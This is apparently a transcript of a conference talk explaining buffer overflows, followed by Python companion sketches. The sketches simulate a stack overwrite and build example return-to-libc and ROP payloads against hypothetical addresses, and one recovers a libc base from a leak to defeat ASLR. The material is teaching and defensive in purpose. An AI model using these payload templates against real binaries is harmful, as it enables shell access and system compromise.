
Welcome, everyone, and thank you for staying till the end. This talk is about breaking down buffer overflow exploits. For the next 25 minutes we'll talk about what buffer overflow attacks are, how you spot these vulnerabilities in binaries, and how you patch them, so it's an end-to-end discussion of this security issue. We'll also talk about some newer research trends in this space. So, just a quick intro about me.
I'm a software security engineer at Block. I'm pretty active in the cybersecurity industry and love giving talks like this one. I'm also an avid CTF player, and I did my master's in cybersecurity at Georgia Tech.

Before we start, I'd like to get a sense of the audience. Have you ever used a buffer overflow, maybe in a CTF, or discovered a real-life security issue that involves one? Okay, so we have a mixed audience: some of you don't know what a buffer overflow is, but we also have people who have discovered this.

So this is a security issue you find in binaries. Once you have an entry point through an input that the binary accepts, you can potentially use that one input to hijack the whole binary and get control over it, maybe even get a shell. And if the binary is running as root, you're pretty much set, because now you have shell access as root. So this is just one entry point in the binary, and it can do a lot of magic for you.

There have been real-life examples of this happening in a lot of production-grade software that we use. One example is the Chrome browser, where many of these issues have been discovered. It affects basically any program written in C or C++, the system-level languages where you have direct control over the program's memory. The exception, of course, is newer languages like Rust, which handles memory in a totally different way. So while you might have seen
typical examples in CTF challenges where you discover a buffer overflow, there are a lot of good mitigations out there now, and these issues are not as prevalent as they were before. This is also called stack smashing.

Let's take a quick look at a vulnerable program that can cause this. It's a very simple three-line program. We have a function with a character array, and we're using a vulnerable function called strcpy. We're just copying whatever we get in bar, the argument, into c. If you look at the last line, there's no bounds checking on the copy. So if you have an input that is larger than the character array, which is 12 bytes, it can lead to a buffer overflow. For example, if you put a big string in bar, strcpy copies it into the c character array with no bounds checking. It's just going to copy the whole string, go beyond the limit of 12 characters, and keep writing into the program's memory. That is what causes a buffer overflow, and there are various ways you can use a buffer overflow to do a lot of interesting things.

First, let's look at the memory layout of a program. You have the runtime heap, the read/write segment, and then the stack, with kernel memory at the top. The stack layout is on the right. Whenever you call a function, you have the return address
stored on the stack. You also have the function parameters, which is bar here, the previous frame's base pointer, and the local variables, which is the character array. So everything for the function lives on the stack, including the frame pointer, the return address, and the function parameters, and you can do a lot of interesting stuff once you gain control of the stack.

This is the normal stack state for this specific example. We have the character array, as I said, which is of length 12. Then we have the bar pointer, which was the function argument, and this is the saved frame pointer and the return address for the function, that is, the address execution returns to once the function is done. Let's say you copy a string like "hello", which has a null byte at the end. It's just a five-letter string, well within the 12-byte limit of the character array, so there's no issue and no overflow here. It's just a simple string that we copied into the character array.

Now let's see what happens if we go beyond the 12-byte limit. We copied a string that is longer than 12 characters, and notice how it overflows the stack. It overwrites the saved frame pointer, and it also overwrites the return address. If you're able to overwrite the return address, you can hijack the program flow. So we craft our payload so that it takes over the return address, because the return address is the key here. Once we control it, we can do a lot. What we do is craft a payload that has a bunch of A's followed by a little-endian address, which is this one, and this address points to the top, where you can put basically anything interesting and hijack the program flow. That is essentially how a buffer overflow occurs.

Now, what can you do once you have this capability to overwrite the return address? Multiple things. You can do a return-to-libc attack, you can use ROP chains to pivot and hijack the binary, and you can also inject
shellcode. We're going to cover all of these scenarios and the situations in which you'd use each attack method.

Let's talk about the first one, shellcode injection. Shellcode is a piece of code that does something like spin up a new shell. What we do here is inject our own shellcode into the payload that we just sent. Instead of the A's, we have our shellcode, and we make the return address point to the shellcode. So when the function is done executing, it goes to the return address, which points to the shellcode, and the shellcode executes.

But this only works when the stack is executable. Your binary has a number of protection flags, and one of them is the NX bit, the no-execute bit. If NX is not set, you can execute whatever code is on the stack, which is not good practice because it allows things like shellcode injection. This isn't common in binaries today. When you compile a simple C program, or any kind of program, an executable stack is not enabled by default because it's a security issue. If you want to enable it and try this out yourself, you'll have to do that manually, through a GCC flag or something similar.

Shellcode is also very architecture specific. There is shellcode that can be architecture agnostic, but that's unusual. If you want to hijack a 32-bit binary or an ARM binary, you need shellcode written for that architecture, and it will generally only work on that architecture.

The second technique I mentioned was return-to-libc, and the third was ROP. For return-to-libc, imagine a situation where the stack is not executable, which is a normal binary. We just saw a case where the stack was executable, but we're not going to get that in real life. What we'll realistically have is a non-executable stack. So what do you do now? You can use something like
return-to-libc. When you do the buffer overflow, you craft your payload so that you have the buffer padding, then the address of a libc function, then a garbage return pointer, and then the argument to the libc function. This is exactly how it looks here. system is a libc function, so if you can get the address of system within the process, you place that address so that it lands on the saved return address, just past the saved EBP, and you pass "/bin/sh" as the argument to system. Once it's called, you get shell access through the binary. This also works when the binary is hosted remotely: if you can reach it through netcat or a socket, you can send your payload remotely and get shell access that way.

The third attack we have here is called return-oriented programming, and it's an attack in a league of its own. There's been so much research on it. So this
is a very interesting trick that security researchers use. You take a curated set of instruction sequences and use them to hijack the program flow entirely and execute any function you want. That function could be in libc, or it could just be a function in the program. A fun fact is that return-oriented programming is actually Turing complete, so you can use it as a full-fledged programming language. You can just get a shell, or set up a reverse shell, and since it's literally acting like a programming language, you can do a lot with it.

The way it works builds on the libc layout we just saw with system. The limitation there is that we added a fake return pointer. Once you call system and have the shell, if you then exit the shell, the program crashes, because it returns to the fake return pointer. It doesn't know what to do once system is done executing. With return-oriented programming, you can have the program keep executing things on your behalf. It executes a function, returns, executes another function, and so on, so you can do basically anything.

For this we use what are called ROP gadgets, which are short instruction sequences already in the binary that end in a return, typically a pop instruction followed by a ret. That's usually how you find these gadgets, and you line up their addresses when you craft the payload. The reason the pop matters is that when you make a system call, or call a function on 64-bit, the arguments are expected in registers. On x86-64, the first argument goes in RDI. Once you have the right arguments in the right registers, you can make the call and do basically anything.

These are some examples of real vulnerabilities that were found recently, and all of these are pretty
recent. There was a heap buffer overflow found in Chrome's WebP image library. There was also one in the kernel, and one in glibc, the GNU version of libc, the C library. All of these are programs written extensively in C. So I expect security researchers to keep finding these kinds of issues as long as we have programs that rely heavily on these low-level languages with manual memory management.

So what are some protections we can use against these kinds of overflows? These are actively used in binaries today. The first is the stack canary. The second is the NX bit, which I mentioned just now: the no-execute bit, which lets us make memory pages non-executable. There are two more: address space layout randomization, and some Linux- and Windows-specific protections. Most of these are enabled by default by modern compilers and operating systems, so you usually don't have to enable them explicitly. If you just compile a simple C program, they'll be on by default. If you want a binary without these protections, you have to ask for that explicitly.

The first protection was the stack canary. In our first case, we saw how the buffer overflow happens: we were able to overflow the buffer and write to the return address. Here you use a neat little trick. A canary is essentially a random secret value placed before the return address. So when you overflow the vulnerable buffer, you also overwrite the canary. Before the function returns, the program compares the value on the stack against the original value. If they don't match, it knows a buffer overflow has taken place, because the value on the stack has been overwritten and no longer matches the value kept in the GS segment. So it flags the overflow and stops the program. It's just not
going to allow it to execute.

The second thing is address space layout randomization. Your program has several regions: the heap, the stack, and the library code, meaning the code for all the libraries linked to the binary, along with the program code. What the system does is randomize the base address of these regions every time you execute the binary. The benefit is that it protects against the return-oriented programming attack we talked about, because for that to work you need to know the address of the library function you're trying to execute. For example, if you want to call system, you have to know its address. The problem for the attacker is that every time the binary runs, that address changes.

But notice that only the base address is randomized. The system function sits in the library code, at a fixed offset from the library's base. So if we can figure out the base address somehow, we can get to system, because it's just an offset from that base address in the library code. All we need to do to break ASLR is guess, or otherwise figure out, the base address of each of these regions. For a 32-bit binary you can actually brute-force it, because the 32-bit address space is small enough to exhaust pretty quickly. That's not feasible for a 64-bit program. In that case, what you do is look for leaks in the binary, bugs that disclose memory contents, and try to recover the base address from them.

So those are the two attacker techniques we've talked about already. Attackers also do a few other things: they try to leak the canary or just brute-force it, and there's another trick called heap spraying that's also pretty popular.

There are some recent advancements in protecting against these kinds of security issues, and a lot of them are actually on the
hardware side. We have hardware shadow stacks, where the hardware maintains a second copy of the return addresses, the shadow stack, and if it doesn't match the actual stack, it raises a fault. That basically protects the returns. Then there's pointer authentication, introduced by ARM, which signs the pointer with a cryptographic signature so you can make sure it hasn't been tampered with. And of course the last thing is to use memory-safe languages like Rust and Go. Rust is pretty good at tackling these issues because it manages memory in a totally different way. It uses the concept of ownership to make sure these heap and overflow attacks don't happen, and its compiler is pretty picky: it refuses to compile if it detects memory issues in the program.

So what can you do to fix this? First, you can obviously patch your code. Second, you can rely on defense in depth, which is largely done for you already by the compiler and operating system, which automatically enable protection mechanisms like canaries, ASLR, and the rest. The third thing is to use memory-safe languages: if you're considering C, try to replace it with something like Rust. And finally, as I guess every security team would suggest, keep your software up to date. There are a lot of these security issues out in the wild, but once your systems and software are updated, you're protected against the known ones.

And I guess we're on time, with about a minute left. If you want to grab a copy of this presentation, I know it was a bit text heavy, but that's so you can refer back to it afterwards. If you forget something, you can go back to the text. You can use this QR code or just go to the URL to get the slides.
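
As a companion to the three-line strcpy example from the talk, here is a minimal Python sketch that simulates the stack frame as a byte array, so the overwrite can be observed safely. The 32-bit layout (12-byte buffer, 4-byte saved frame pointer, 4-byte return address, 4-byte parameter slot), the helper names, and every address are assumptions made for illustration, not values from the slides.

```python
import struct

BUF_SIZE = 12                 # char c[12] from the talk
FP_OFF = BUF_SIZE             # saved frame pointer follows the buffer (assumed layout)
RET_OFF = FP_OFF + 4          # then the 4-byte return address (32-bit assumed)
FRAME_SIZE = RET_OFF + 4 + 4  # plus a 4-byte slot for the bar parameter


def new_frame(saved_fp: int, ret_addr: int) -> bytearray:
    """Build a toy frame: c[12] | saved FP | return address | bar."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<II", frame, FP_OFF, saved_fp, ret_addr)
    return frame


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic strcpy: copy up to the first NUL, append a NUL, ignore BUF_SIZE."""
    data = data.split(b"\x00", 1)[0] + b"\x00"
    if len(data) > len(frame):
        raise ValueError("toy frame too small for this input")
    frame[0:len(data)] = data


def return_address(frame: bytearray) -> int:
    """Read the little-endian return address back out of the toy frame."""
    return struct.unpack_from("<I", frame, RET_OFF)[0]


ORIGINAL_RET = 0x08048456   # hypothetical caller address
TARGET = 0xBFFFF6C0         # hypothetical attacker-chosen address

frame = new_frame(saved_fp=0xBFFFF6D8, ret_addr=ORIGINAL_RET)

# "hello" plus its NUL is 6 bytes, so it stays inside the 12-byte buffer.
unchecked_copy(frame, b"hello")
fits_ret = return_address(frame)

# 16 filler bytes cover c[12] and the saved frame pointer; the next 4 bytes
# land on the return address, written in little-endian order.
payload = b"A" * 16 + struct.pack("<I", TARGET)
unchecked_copy(frame, payload)
smashed_ret = return_address(frame)

print(hex(fits_ret), hex(smashed_ret))
```

The short input leaves the return address alone, while the 20-byte payload replaces it. That is the whole bug: the copy never compares the input length to the buffer size.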
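
The return-to-libc layout described in the talk (padding, address of system, a garbage return pointer, then the argument) can be sketched as a byte string. This is a rough illustration for a 32-bit target; the function name `ret2libc_payload`, the 16-byte offset, and all addresses are hypothetical and would differ for any real binary.

```python
import struct


def ret2libc_payload(offset_to_ret: int, system_addr: int,
                     binsh_addr: int, fake_ret: int = 0x41414141) -> bytes:
    """Lay out a 32-bit return-to-libc payload.

    padding | address of system | fake return pointer | pointer to "/bin/sh"
    """
    padding = b"A" * offset_to_ret
    return padding + struct.pack("<III", system_addr, fake_ret, binsh_addr)


# All three values below are made up for the example.
OFFSET_TO_RET = 16          # c[12] plus the 4-byte saved frame pointer
SYSTEM_ADDR = 0xB7E42DA0    # hypothetical address of system() in libc
BINSH_ADDR = 0xB7F6382B     # hypothetical address of the string "/bin/sh"

payload = ret2libc_payload(OFFSET_TO_RET, SYSTEM_ADDR, BINSH_ADDR)
print(payload.hex())
```

The fake return pointer is where execution goes after system returns, which is why exiting the shell crashes the program in this simple form.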
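
For the 64-bit ROP case, where the first argument has to be in RDI before the call, a chain built around a single "pop rdi; ret" gadget might look like the sketch below. The gadget address, the function address, and the 24-byte offset are all assumptions; in practice they come from inspecting the specific binary, and some targets need extra gadgets that this sketch omits.

```python
import struct


def rop_chain(offset_to_ret: int, pop_rdi_ret: int,
              arg_addr: int, func_addr: int) -> bytes:
    """Build a minimal x86-64 chain: load RDI from the stack, then call func.

    padding | &(pop rdi; ret) | value popped into RDI | address of function
    """
    padding = b"A" * offset_to_ret
    return padding + struct.pack("<QQQ", pop_rdi_ret, arg_addr, func_addr)


# Hypothetical values for illustration only.
OFFSET_TO_RET_64 = 24            # assumed distance from buffer start to return address
POP_RDI_RET = 0x00000000004011FB  # assumed address of a "pop rdi; ret" gadget
ARG_ADDR = 0x0000000000404060     # assumed address of a "/bin/sh" string
FUNC_ADDR = 0x0000000000401040    # assumed address of the function to call

chain = rop_chain(OFFSET_TO_RET_64, POP_RDI_RET, ARG_ADDR, FUNC_ADDR)
print(len(chain), chain.hex())
```

Each 8-byte slot is consumed in order: the first ret jumps to the gadget, the pop moves the next slot into RDI, and the gadget's own ret jumps to the function. Longer chains repeat this pattern.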
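
The stack canary check from the talk can be modeled in a few lines. This is a simplified simulation, not how a compiler emits the check: the class name `GuardedFrame`, the 4-byte canary, and the layout are assumptions, and the reference copy stands in for the value the talk describes as kept in the GS segment.

```python
import secrets
from typing import Optional

BUF_SIZE = 12
CANARY_SIZE = 4


class GuardedFrame:
    """Toy frame laid out as: buffer[12] | canary | return address."""

    def __init__(self, ret_addr: bytes, canary: Optional[bytes] = None):
        # The reference copy lives off the simulated stack.
        self.reference = canary if canary is not None else secrets.token_bytes(CANARY_SIZE)
        self.stack = bytearray(BUF_SIZE) + self.reference + ret_addr

    def unchecked_write(self, data: bytes) -> None:
        """Write into the buffer without a bounds check, like strcpy."""
        if len(data) > len(self.stack):
            raise ValueError("toy frame too small for this input")
        self.stack[0:len(data)] = data

    def canary_intact(self) -> bool:
        """The check performed before the function returns."""
        on_stack = bytes(self.stack[BUF_SIZE:BUF_SIZE + CANARY_SIZE])
        return on_stack == self.reference


RET = bytes.fromhex("56840408")  # hypothetical return address, little-endian

safe = GuardedFrame(RET)
safe.unchecked_write(b"hello\x00")
print("short input intact:", safe.canary_intact())

smashed = GuardedFrame(RET)
smashed.unchecked_write(b"A" * 20)  # runs through the canary into the return address
print("long input intact:", smashed.canary_intact())
```

An overflow that reaches the return address has to pass through the canary first, so the mismatch is detected unless the attacker already knows the canary value, which is why leaking or brute-forcing it is the usual bypass.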
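
The ASLR point, that only the base address is randomized and system is a fixed offset from it, comes down to simple arithmetic once one library address has leaked. In this sketch the offsets and the leaked address are invented; real offsets depend on the exact libc build, and the helper names are hypothetical.

```python
PAGE_MASK = 0xFFF

# Hypothetical offsets of two symbols inside one specific libc build.
PUTS_OFFSET = 0x80E50
SYSTEM_OFFSET = 0x4F550


def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Recover the randomized base from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    # Library bases are page aligned, so a misaligned result means the
    # offset does not match the libc that is actually loaded.
    if base & PAGE_MASK:
        raise ValueError("base is not page aligned; wrong offset or wrong libc")
    return base


def resolve(base: int, symbol_offset: int) -> int:
    """Turn a known offset into an absolute address for this run."""
    return base + symbol_offset


leaked_puts = 0x7F3A1C280E50   # made-up address leaked during one run
base = libc_base_from_leak(leaked_puts, PUTS_OFFSET)
system_addr = resolve(base, SYSTEM_OFFSET)
print(hex(base), hex(system_addr))
```

The base changes on every run, so the leak and the payload have to happen within the same process lifetime.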